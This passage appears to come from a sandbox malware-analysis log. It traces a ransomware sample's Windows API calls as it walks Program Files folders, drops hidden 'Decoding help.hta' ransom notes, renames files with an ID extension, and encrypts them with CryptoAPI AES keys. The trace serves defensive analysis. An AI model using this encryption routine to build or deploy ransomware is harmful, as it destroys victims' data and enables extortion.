ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43a82ff0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoBase.dll", cAlternateFileName="")) returned 1 [0039.771] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" [0039.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.771] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoBase.dll") returned -1 [0039.771] lstrlenW (lpString="PhotoBase.dll") returned 13 [0039.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="PhotoBase.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll" [0039.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll" [0039.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll" (normalized: "c:\\program files\\windows photo viewer\\photobase.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows photo viewer\\photobase.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.772] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb121d3ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb121d3ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb13c02ce, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1a5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 1 [0039.772] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" [0039.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.772] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoViewer.dll") returned -1 [0039.772] lstrlenW (lpString="PhotoViewer.dll") returned 15 [0039.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="PhotoViewer.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll" [0039.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll" [0039.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll" (normalized: "c:\\program files\\windows photo viewer\\photoviewer.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows photo viewer\\photoviewer.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.802] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb121d3ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb121d3ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb13c02ce, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1a5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 0 [0039.802] FindClose (in: hFindFile=0x5a5630 | out: hFindFile=0x5a5630) returned 1 Thread: id = 97 os_tid = 0xbb8 [0039.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*", lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5630 [0039.724] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.724] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x987bf1ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x987bf1ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.724] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.724] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.724] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa93f44c2, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa93f44c2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa93f44c2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0039.724] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*" [0039.725] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*") returned 49 [0039.725] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Portable Devices\\Decoding help.hta" [0039.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Portable Devices\\Decoding help.hta" (normalized: "c:\\program files\\windows portable devices\\decoding help.hta")) returned 0xffffffff [0039.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Portable Devices\\Decoding help.hta" (normalized: "c:\\program files\\windows portable devices\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0039.725] WriteFile (in: hFile=0x218, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x9d8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x9d8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.726] CloseHandle (hObject=0x218) returned 1 [0039.726] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Portable Devices\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.726] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqmapi.dll") returned -1 [0039.726] lstrlenW (lpString="sqmapi.dll") returned 10 [0039.726] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*" [0039.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Portable Devices\\*.*") returned 49 [0039.726] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\", lpString2="sqmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll") returned="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll" [0039.726] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll") returned="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll" [0039.727] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll" (normalized: "c:\\program files\\windows portable devices\\sqmapi.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Portable Devices\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows portable devices\\sqmapi.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.727] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa93f44c2, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa93f44c2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa93f44c2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0039.727] FindClose (in: hFindFile=0x5a5630 | out: hFindFile=0x5a5630) returned 1 Thread: id = 98 os_tid = 0xbbc [0039.741] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*", lpFindFileData=0x9ecfd30 | out: lpFindFileData=0x9ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55f0 [0039.741] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.741] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x9ecfd30 | out: lpFindFileData=0x9ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.741] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.741] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.741] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x9ecfd30 | out: lpFindFileData=0x9ecfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9268e20, ftCreationTime.dwHighDateTime=0x1d4e3b9, ftLastAccessTime.dwLowDateTime=0x422dc780, ftLastAccessTime.dwHighDateTime=0x1d4cb47, ftLastWriteTime.dwLowDateTime=0x422dc780, ftLastWriteTime.dwHighDateTime=0x1d4cb47, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="agentssee.exe", cAlternateFileName="AGENTS~1.EXE")) returned 1 [0039.741] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" [0039.741] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned 40 [0039.741] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Decoding help.hta" [0039.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\decoding help.hta")) returned 0xffffffff [0039.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0039.741] WriteFile (in: hFile=0x210, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x9ecfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x9ecfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.742] CloseHandle (hObject=0x210) returned 1 [0039.742] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.743] lstrcmpiW (lpString1="Decoding help.hta", lpString2="agentssee.exe") returned 1 [0039.743] lstrlenW (lpString="agentssee.exe") returned 13 [0039.743] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" [0039.743] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned 40 [0039.743] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\", lpString2="agentssee.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe" [0039.743] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe" [0039.743] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe" (normalized: "c:\\program files\\windows sidebar\\agentssee.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\agentssee.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\agentssee.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0039.743] CreateFileMappingA (hFile=0x210, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x218 [0039.743] CryptAcquireContextA (in: phProv=0x9ecfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9ecfcec*=0x5dc830) returned 1 [0039.744] CryptGenKey (in: hProv=0x5dc830, Algid=0x6610, dwFlags=0x1, phKey=0x9ecfce8 | out: phKey=0x9ecfce8*=0x5a5670) returned 1 [0039.744] CryptExportKey (in: hKey=0x5a5670, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x9ecfbe4, pdwDataLen=0x9ecfce4 | out: pbData=0x9ecfbe4*, pdwDataLen=0x9ecfce4*=0x2c) returned 1 [0039.744] MapViewOfFile (hFileMappingObject=0x218, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.749] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9ecfbe4*, pdwDataLen=0x9ecfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x9ecfbe4*, pdwDataLen=0x9ecfcf8*=0x100) returned 1 [0039.749] CryptEncrypt (in: hKey=0x5a5670, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x9ecfce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x510000*, pdwDataLen=0x9ecfce4*=0x12800) returned 1 [0039.750] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.752] CloseHandle (hObject=0x218) returned 1 [0039.752] CryptDestroyKey (hKey=0x5a5670) returned 1 [0039.752] CryptReleaseContext (hProv=0x5dc830, dwFlags=0x0) returned 1 [0039.752] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.752] WriteFile (in: hFile=0x210, lpBuffer=0x9ecfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ecfcf8, lpOverlapped=0x0 | out: lpBuffer=0x9ecfbe4*, lpNumberOfBytesWritten=0x9ecfcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.753] WriteFile (in: hFile=0x210, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x9ecfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x9ecfcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.753] CloseHandle (hObject=0x210) returned 1 [0039.754] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\agentssee.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.755] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x9ecfd30 | out: lpFindFileData=0x9ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x237a3493, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.755] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.755] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.755] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.755] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" [0039.755] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned 40 [0039.755] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US" [0039.755] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\en-US\\*.*" [0039.755] GlobalMemoryStatus (in: lpBuffer=0x9ecfd10 | out: lpBuffer=0x9ecfd10) [0039.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f91088, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x210 [0039.767] CloseHandle (hObject=0x210) returned 1 [0039.767] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x9ecfd30 | out: lpFindFileData=0x9ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0039.767] lstrcmpW (lpString1=".", lpString2="Gadgets") returned -1 [0039.767] lstrcmpW (lpString1="..", lpString2="Gadgets") returned -1 [0039.767] lstrcmpiW (lpString1="windows", lpString2="Gadgets") returned 1 [0039.769] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" [0039.769] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned 40 [0039.769] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\", lpString2="Gadgets" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets" [0039.769] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0039.769] GlobalMemoryStatus (in: lpBuffer=0x9ecfd10 | out: lpBuffer=0x9ecfd10) [0039.769] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a00ad8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x210 [0039.781] CloseHandle (hObject=0x210) returned 1 [0039.781] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x9ecfd30 | out: lpFindFileData=0x9ecfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7046d1e0, ftCreationTime.dwHighDateTime=0x1d4c9b5, ftLastAccessTime.dwLowDateTime=0x8cc6e530, ftLastAccessTime.dwHighDateTime=0x1d50c36, ftLastWriteTime.dwLowDateTime=0x8cc6e530, ftLastWriteTime.dwHighDateTime=0x1d50c36, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="hopefully_pledge_nor.exe", cAlternateFileName="HOPEFU~1.EXE")) returned 1 [0039.781] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" [0039.781] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned 40 [0039.781] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Decoding help.hta" [0039.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\decoding help.hta")) returned 0x1 [0039.781] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hopefully_pledge_nor.exe") returned -1 [0039.781] lstrlenW (lpString="hopefully_pledge_nor.exe") returned 24 [0039.781] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\*.*" [0039.781] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows 